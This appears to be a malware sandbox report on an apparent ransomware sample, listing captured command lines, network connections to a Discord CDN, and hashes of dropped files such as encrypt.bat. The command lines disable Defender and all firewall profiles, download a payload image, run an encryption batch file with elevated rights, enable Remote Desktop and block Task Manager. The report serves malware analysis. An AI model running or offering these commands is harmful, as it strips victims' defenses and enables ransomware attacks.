C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2550070480749187065,9792735792829269381,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4720 /prefetch:2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244074466372489216/212723.jpg?ex=6653ca22&is=665278a2&hm=488e396c7831aaf740c20bf7536b9cc45421a2218ebf98197ebc307863606195&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 105.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 162.159.135.233:443 cdn.discordapp.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI7162\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

C:\Users\Admin\AppData\Local\Temp\_MEI7162\VCRUNTIME140.dll

MD5 be8dbe2dc77ebe7f88f910c61aec691a
SHA1 a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA256 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA512 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

C:\Users\Admin\AppData\Local\Temp\_MEI7162\base_library.zip

MD5 08332a62eb782d03b959ba64013ac5bc
SHA1 b70b6ae91f1bded398ca3f62e883ae75e9966041
SHA256 8584f0eb44456a275e3bc69626e3acad595546fd78de21a946b2eb7d6ba02288
SHA512 a58e4a096d3ce738f6f93477c9a73ddbfcb4b82d212c0a19c0cf9e07f1e62b2f477a5dd468cd31cc5a13a73b93fa17f64d6b516afef2c56d38ede1ace35cf087

C:\Users\Admin\AppData\Local\Temp\_MEI7162\python3.DLL

MD5 79b02450d6ca4852165036c8d4eaed1f
SHA1 ce9ff1b302426d4c94a2d3ea81531d3cb9e583e4
SHA256 d2e348e615a5d3b08b0bac29b91f79b32f0c1d0be48976450042462466b51123
SHA512 47044d18db3a4dd58a93b43034f4fafa66821d157dcfefb85fca2122795f4591dc69a82eb2e0ebd9183075184368850e4caf9c9fea0cfe6f766c73a60ffdf416

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_ctypes.pyd

MD5 bbd5533fc875a4a075097a7c6aba865e
SHA1 ab91e62c6d02d211a1c0683cb6c5b0bdd17cbf00
SHA256 be9828a877e412b48d75addc4553d2d2a60ae762a3551f9731b50cae7d65b570
SHA512 23ef351941f459dee7ed2cebbae21969e97b61c0d877cfe15e401c36369d2a2491ca886be789b1a0c5066d6a8835fd06db28b5b28fb6e9df84c2d0b0d8e9850e

C:\Users\Admin\AppData\Local\Temp\_MEI7162\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_socket.pyd

MD5 dc06f8d5508be059eae9e29d5ba7e9ec
SHA1 d666c88979075d3b0c6fd3be7c595e83e0cb4e82
SHA256 7daff6aa3851a913ed97995702a5dfb8a27cb7cf00fb496597be777228d7564a
SHA512 57eb36bc1e9be20c85c34b0a535b2349cb13405d60e752016e23603c4648939f1150e4dbebc01ec7b43eb1a6947c182ccb8a806e7e72167ad2e9d98d1fd94ab3

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_lzma.pyd

MD5 05e8b2c429aff98b3ae6adc842fb56a3
SHA1 834ddbced68db4fe17c283ab63b2faa2e4163824
SHA256 a6e2a5bb7a33ad9054f178786a031a46ea560faeef1fb96259331500aae9154c
SHA512 badeb99795b89bc7c1f0c36becc7a0b2ce99ecfd6f6bb493bda24b8e57e6712e23f4c509c96a28bc05200910beddc9f1536416bbc922331cae698e813cbb50b3

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_hashlib.pyd

MD5 eedb6d834d96a3dffffb1f65b5f7e5be
SHA1 ed6735cfdd0d1ec21c7568a9923eb377e54b308d
SHA256 79c4cde23397b9a35b54a3c2298b3c7a844454f4387cb0693f15e4facd227dd2
SHA512 527bd7bb2f4031416762595f4ce24cbc6254a50eaf2cc160b930950c4f2b3f5e245a486972148c535f8cd80c78ec6fa8c9a062085d60db8f23d4b21e8ae4c0ad

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_decimal.pyd

MD5 3055edf761508190b576e9bf904003aa
SHA1 f0dc8d882b5cd7955cc6dfc8f9834f70a83c7890
SHA256 e4104e47399d3f635a14d649f61250e9fd37f7e65c81ffe11f099923f8532577
SHA512 87538fe20bd2c1150a8fefd0478ffd32e2a9c59d22290464bf5dfb917f6ac7ec874f8b1c70d643a4dc3dd32cbe17e7ea40c0be3ea9dd07039d94ab316f752248

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_cffi_backend.cp312-win_amd64.pyd

MD5 0572b13646141d0b1a5718e35549577c
SHA1 eeb40363c1f456c1c612d3c7e4923210eae4cdf7
SHA256 d8a76d1e31bbd62a482dea9115fc1a109cb39af4cf6d1323409175f3c93113a7
SHA512 67c28432ca8b389acc26e47eb8c4977fddd4af9214819f89df07fecbc8ed750d5f35807a1b195508dd1d77e2a7a9d7265049dcfbfe7665a7fd1ba45da1e4e842

C:\Users\Admin\AppData\Local\Temp\_MEI7162\_bz2.pyd

MD5 223fd6748cae86e8c2d5618085c768ac
SHA1 dcb589f2265728fe97156814cbe6ff3303cd05d3
SHA256 f81dc49eac5ecc528e628175add2ff6bda695a93ea76671d7187155aa6326abb
SHA512 9c22c178417b82e68f71e5b7fe7c0c0a77184ee12bd0dc049373eace7fa66c89458164d124a9167ae760ff9d384b78ca91001e5c151a51ad80c824066b8ecce6

C:\Users\Admin\AppData\Local\Temp\_MEI7162\unicodedata.pyd

MD5 16be9a6f941f1a2cb6b5fca766309b2c
SHA1 17b23ae0e6a11d5b8159c748073e36a936f3316a
SHA256 10ffd5207eeff5a836b330b237d766365d746c30e01abf0fd01f78548d1f1b04
SHA512 64b7ecc58ae7cf128f03a0d5d5428aaa0d4ad4ae7e7d19be0ea819bbbf99503836bfe4946df8ee3ab8a92331fdd002ab9a9de5146af3e86fef789ce46810796b

C:\Users\Admin\AppData\Local\Temp\_MEI7162\select.pyd

MD5 92b440ca45447ec33e884752e4c65b07
SHA1 5477e21bb511cc33c988140521a4f8c11a427bcc
SHA256 680df34fb908c49410ac5f68a8c05d92858acd111e62d1194d15bdce520bd6c3
SHA512 40e60e1d1445592c5e8eb352a4052db28b1739a29e16b884b0ba15917b058e66196988214ce473ba158704837b101a13195d5e48cb1dc2f07262dfecfe8d8191

C:\Users\Admin\AppData\Local\Temp\_MEI7162\cryptography\hazmat\bindings\_rust.pyd

MD5 61d63fbd7dd1871392997dd3cef6cc8e
SHA1 45a0a7f26f51ce77aa1d89f8bedb4af90e755fa9
SHA256 ae3a2936b138a2faa4d0cd6445fae97e441b23f6fdafb1a30e60fd80c37d7df5
SHA512 c31f1f281d354acb424a510d54790ee809364b55425b1d39429e1bb7c379126578260c6f197834339a34833c90e748483aabd426295731f78fcde9580fcd8f9f

C:\Users\Admin\AppData\Local\Temp\_MEI7162\libcrypto-3.dll

MD5 e547cf6d296a88f5b1c352c116df7c0c
SHA1 cafa14e0367f7c13ad140fd556f10f320a039783
SHA256 05fe080eab7fc535c51e10c1bd76a2f3e6217f9c91a25034774588881c3f99de
SHA512 9f42edf04c7af350a00fa4fdf92b8e2e6f47ab9d2d41491985b20cd0adde4f694253399f6a88f4bdd765c4f49792f25fb01e84ec03fd5d0be8bb61773d77d74d

memory/4368-204-0x00007FFA16B03000-0x00007FFA16B05000-memory.dmp

memory/4368-210-0x00000188C1790000-0x00000188C17B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2yvpjmb.zg3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4368-215-0x00007FFA16B00000-0x00007FFA175C1000-memory.dmp

memory/4368-216-0x00007FFA16B00000-0x00007FFA175C1000-memory.dmp

memory/4368-217-0x00007FFA16B00000-0x00007FFA175C1000-memory.dmp

memory/4368-220-0x00007FFA16B00000-0x00007FFA175C1000-memory.dmp

C:\Encrypt\encrypt.bat

MD5 e678740f3d7186df8911224ea11f35f1
SHA1 f01a152d4388c856e14819f2b9d36db67cb1d22e
SHA256 181f77f261d2a8ba55f2926ac9997b8a95d3068ec32afa60465cb9b98e08435a
SHA512 6d1ee7e000a60f1618264a10279ae186d1a03e98143b1e3090a656b8cc8205c28db0caf0b31f4584c72570b9a322187a8554e66e9c564d1ab66bcfdb4a32fec9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 eaa3db555ab5bc0cb364826204aad3f0
SHA1 a4cdfaac8de49e6e6e88b335cfeaa7c9e3c563ca
SHA256 ef7baeb1b2ab05ff3c5fbb76c2759db49294654548706c7c8e87f0cde855b86b
SHA512 e13981da51b52c15261ecabb98af32f9b920651b46b10ce0cc823c5878b22eb1420258c80deef204070d1e0bdd3a64d875ac2522e3713a3cf11657aa55aeccd4

\??\pipe\LOCAL\crashpad_4616_NBQJIZPDFVZYNAOX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 4b4f91fa1b362ba5341ecb2836438dea
SHA1 9561f5aabed742404d455da735259a2c6781fa07
SHA256 d824b742eace197ddc8b6ed5d918f390fde4b0fbf0e371b8e1f2ed40a3b6455c
SHA512 fef22217dcdd8000bc193e25129699d4b8f7a103ca4fe1613baf73ccf67090d9fbae27eb93e4bb8747455853a0a4326f2d0c38df41c8d42351cdcd4132418dac

C:\Encrypt\encrypt.html

MD5 60722a327960e4b4f5d967101a72ed06
SHA1 04109aaa12c19c7cb4c062b34d4ab4bfe4f52c5e
SHA256 3441d2b980fc2b4504c2308e6ec5da713c6bb0afd0ca9c846eec198cd1e2edfd
SHA512 98812a8546200353ae3c81733963082cbc6f2041b21d3897a5f26b63fbb0b730d81ab438286bdbdaef9eac8bfe3fe81fddabef2c0fd5f000a4279828bfdad896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5311c6e69c685511e5d03270689fd5d1
SHA1 66e47f50e1266518dcd9171bad5539e9861ef3a1
SHA256 5543ecbb1b28f1aef940da88bc2502331ccb48bc74571f395b439b7574515b9a
SHA512 bb680c1b661c40371756b580fa483da85a0ce0371547facb46bb6bbded5347cfd300420eff7d8bb472756891c5f5c96c91425a47c905542423866100c6e6f41b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

